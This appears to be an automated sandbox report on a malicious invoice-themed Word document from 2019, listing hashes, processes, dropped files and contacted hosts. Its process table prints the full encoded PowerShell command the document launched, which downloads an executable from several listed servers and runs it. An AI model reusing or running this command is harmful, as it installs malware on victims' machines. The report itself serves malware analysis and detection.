File name: | Inv-2019-092618-05-02-2019.doc |
Full analysis: | https://app.any.run/tasks/46a22013-3aa7-400c-8ccf-b07cef12b488 |
Verdict: | Malicious activity |
Analysis date: | February 18, 2019, 14:50:48 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 14:23:00 2019, Last Saved Time/Date: Mon Feb 18 14:23:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0 |
MD5: | E7C143CF63549E7FE57C5A6B2E43D371 |
SHA1: | FB09DFD8C54D65EAEA3AAE7B00A1DA01A9200DA9 |
SHA256: | 9E17EDB77FD3577752DFBE1CF620166845C80AD7F3E92531D2795E8C81043DCE |
SSDEEP: | 6144:ZG5/BnVfRFJ7KK9aHScdX9znGU/Nu6kvIOSZbO4Vc7co7ta1hw++u+:Z2n9R/lA5dX9znGU/3kvIPO4VYp7ta18 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:02:18 14:23:00 |
ModifyDate: | 2019:02:18 14:23:00 |
Pages: | 1 |
Words: | 1 |
Characters: | 7 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 7 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3036 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Inv-2019-092618-05-02-2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2720 | powersheLl -e JABuAF8AXwA0AF8AXwAwADkAPQAoACcARwBfACcAKwAnADcAMgA3ADAAJwApADsAJABVAF8AMwAwADEAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6ADkAXwBfADUANAAwAD0AKAAnAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AMQAnACsAJwAzADkALgA1ACcAKwAnADkALgAnACsAJwA2ADQALgAnACsAJwAxADcAMwAvAEcAJwArACcATgBzACcAKwAnAGQAOABIAEcAYgAnACsAJwBFACcAKwAnAHQAJwArACcAQABoAHQAdABwACcAKwAnADoALwAvADEAMQA4ACcAKwAnAC4AJwArACcAMgA1AC4AMQA3ADYALgAzADgALwBzAHAAJwArACcATAB4AEYAWgBEAFcAJwArACcAQwB5AEAAJwArACcAaAB0AHQAJwArACcAcAA6AC8ALwAxADMALgAyADMAMwAuACcAKwAnADMAMQAuADIAMAAnACsAJwAzAC8AJwArACcAcABOAHUAJwArACcAWQBNAEkAUwAnACsAJwBTAEAAaAAnACsAJwB0AHQAcAA6AC8AJwArACcALwAnACsAJwBhAGwAbABlACcAKwAnAG4AcwAnACsAJwAuAHkAJwArACcAbwB1AGMAaABlACcAKwAnAGMAawBpACcAKwAnAHQAJwArACcALgBjAGEALwB5ACcAKwAnAFYAJwArACcAeABFAHYAJwArACcAMQAnACsAJwA5AEAAJwArACcAaAB0AHQAcAA6ACcAKwAnAC8ALwAxADMAJwArACcALgAxACcAKwAnADIAJwArACcANgAuADYAMQAnACsAJwAuADEAMQAvADcAeQB4ACcAKwAnAHQAbABzAFYAUAAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABpAF8ANQA0ADEAMQA4AD0AKAAnAE0AJwArACcANwA3AF8ANAAzACcAKQA7ACQAawAyADcAMgBfAF8AMgAgAD0AIAAoACcAOAA5ACcAKwAnADkAJwApADsAJABkAF8AOAA2ADcANwBfAD0AKAAnAGgAJwArACcANAAxADEAJwArACcANwAzADMAJwApADsAJABXADQAMwAyAF8AOAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAawAyADcAMgBfAF8AMgArACgAJwAuAGUAJwArACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAG0ANQBfAF8ANQA3ACAAaQBuACAAJAB6ADkAXwBfADUANAAwACkAewB0AHIAeQB7ACQAVQBfADMAMAAxAF8ALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbQA1AF8AXwA1ADcALAAgACQAVwA0ADMAMgBfADgAKQA7ACQAYgA4AF8AXwBfADQAXwA3AD0AKAAnAE0AXwAwADgAJwArACcAOABfACcAKwAnADIAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAVwA0ADMAMgBfADgAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABXADQAMwAyAF8AOAA7ACQATgA2AF8AOAAwADcAPQAoACcARQAzACcAKwAnADEANABfAF8ANgAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAagAwADIANAA5ADEAPQAoACcARQAwAF8AMAAnACsAJwA4ADMAJwApADsA | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3036 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8C48.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2720 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\75BXO0Y5EBWM5RWW0DSF.temp | — | |
MD5:— | SHA256:— | |||
3036 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:A8F52371DE1F91D43D663BD22B2CF6D4 | SHA256:B76AA0A33756385BB842CBE0B0112AD7513639800603DE6C2FAA245C4815A58C | |||
3036 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Inv-2019-092618-05-02-2019.doc.LNK | lnk | |
MD5:84C96C825D889A9C35218530113A5DF3 | SHA256:ABC3AAE26822C0630BA6675D76154E10BA2FAB438EE29DC771C6B82AE147101B | |||
2720 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3036 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:E38C46694F93F7B7521B835043B365A5 | SHA256:80AFEF6DBF00D7FBBFE3A67DB00E4F9E36A0D1161385E0E185863FC6F10CEB00 | |||
3036 | WINWORD.EXE | C:\Users\admin\Desktop\~$v-2019-092618-05-02-2019.doc | pgc | |
MD5:3EF9613538AF284647437C29F9D4316F | SHA256:A8EFAAAEE6E508F28CEFAEE45B337C1ACD456FFEE38D5B67FBDFB07508897511 | |||
2720 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199d30.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2720 | powersheLl.exe | GET | 404 | 139.59.64.173:80 | http://139.59.64.173/GNsd8HGbEt | IN | xml | 345 b | suspicious |
2720 | powersheLl.exe | GET | 404 | 13.126.61.11:80 | http://13.126.61.11/7yxtlsVP | IN | xml | 345 b | unknown |
2720 | powersheLl.exe | GET | 404 | 118.25.176.38:80 | http://118.25.176.38/spLxFZDWCy | CN | xml | 345 b | malicious |
2720 | powersheLl.exe | GET | 404 | 138.197.128.108:80 | http://allens.youcheckit.ca/yVxEv19 | CA | xml | 345 b | malicious |
2720 | powersheLl.exe | GET | 404 | 13.233.31.203:80 | http://13.233.31.203/pNuYMISS | IN | xml | 345 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2720 | powersheLl.exe | 139.59.64.173:80 | — | Digital Ocean, Inc. | IN | suspicious |
2720 | powersheLl.exe | 13.233.31.203:80 | — | Amazon.com, Inc. | IN | suspicious |
2720 | powersheLl.exe | 118.25.176.38:80 | — | — | CN | malicious |
2720 | powersheLl.exe | 13.126.61.11:80 | — | Amazon.com, Inc. | IN | unknown |
2720 | powersheLl.exe | 138.197.128.108:80 | allens.youcheckit.ca | Digital Ocean, Inc. | CA | malicious |
Domain | IP | Reputation |
---|---|---|
allens.youcheckit.ca |
| malicious |